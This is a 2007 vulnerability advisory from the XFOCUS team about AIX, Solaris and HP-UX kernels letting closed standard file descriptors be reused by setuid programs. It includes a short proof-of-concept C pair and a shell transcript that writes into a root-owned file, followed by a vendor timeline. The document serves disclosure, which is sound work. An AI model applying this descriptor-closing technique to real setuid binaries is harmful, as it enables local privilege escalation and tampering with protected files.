XFOCUS team (http://www.xfocus.org/) had discovered Multiple OS kernel insecure handling of stdio file descriptor. =================== Affected OS Version AIX 5.3 Solaris 9 HPUX B11.11 (maybe other version,we did not tested) =========== Description The affected OSes allows local users to write to or read from restricted files by closing the file descriptors 0 (standard input), 1 (standard output), or 2 (standard error), which may then be reused by a called setuid process that intended to perform I/O on normal files. the attack which exploit this vulnerability possibly get root right. ==== POC -bash-3.00$ oslevel -r 5300-03 -bash-3.00$ ls -l bb -rw-r--r-- 1 root system 0 12月05 20时34 bb -bash-3.00$ ls -l k -rwxr-xr-x 1 root system 58242 12月03 23时13 k -bash-3.00$ ls -l tt -rwsr-xr-x 1 root system 59096 12月03 23时14 tt (this is a suid program,called by k) -bash-3.00$ cat k.c int main() { close(2); //close 2 before call tt execl("./tt","./tt",0); } -bash-3.00$ cat tt.c int main() { printf("euid=%i\n",geteuid()); int f=open("/tmp/bb",1); printf("f=%i\n",f); write(2,"hello\n",6); } -bash-3.00$ id uid=202(cloud) gid=1(staff) -bash-3.00$ ./k euid=0 f=2 #err info wrote into bb file -bash-3.00$ ls -l bb -rw-r--r-- 1 root system 6 12月05 20时35 bb ========= Time Line 2005-12-xx Discover this vulnerability 2006-12-12 Initial vendor notifiation 2006-12-12 HP responses ,assgin to SSRT061287; Sun responses but mistake this vulnerablitily as application bug and hope us figoure out real attack vector; Aix no responses; 2007-01-18 public disclosure -- Kind Regards, --- XFOCUS Security Team http://www.xfocus.org
